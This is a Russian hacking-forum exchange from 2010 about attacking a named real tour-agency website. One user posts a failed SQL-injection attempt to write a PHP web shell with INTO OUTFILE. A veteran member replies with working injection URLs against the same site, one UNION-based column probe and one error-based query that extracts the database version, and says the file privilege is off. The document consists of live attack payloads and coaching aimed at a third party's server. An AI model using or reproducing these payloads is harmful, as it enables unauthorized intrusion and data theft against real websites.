29.06.2010, 22:09
|
|
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
Провел на форуме:
9220514
Репутация:
3338
|
|
Сообщение от wkar
wkar said:
Код:
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'\' into outfile \'/home/buddhatour/data/www/buddhatour.' at line 1
запрос:
PHP код:
PHP:
[COLOR="#000000"]http://www.buddhatour.ru/new/?link=1+union+select+'[COLOR="#0000BB"][/COLOR]'+into+outfile+'/home/buddhatour/data/www/buddhatour.ru/e.php'[/COLOR]
Подскажите, где ошибка?
ПС
Мой енв скомпленый под 7.2 http://multi-up.com/297353 пашет в папке /tmp/ 1. Подобрать кол-во полей, а не пытаться сразу лить шелл
Код:
Code:
http://www.buddhatour.ru/new/?link=1+union+select+1,version(),3,4+limit+1,1--+
или так:
http://www.buddhatour.ru/new/?link=(select+1+from+(select+count(0),concat((select+version()),floor(rand(0)*2))+from+information_schema.tables+group+by+2+limit+1)a)--+
2. file_priv=N, ни о какой заливке шелла через скулю здесь речи идти не может.
|
|
|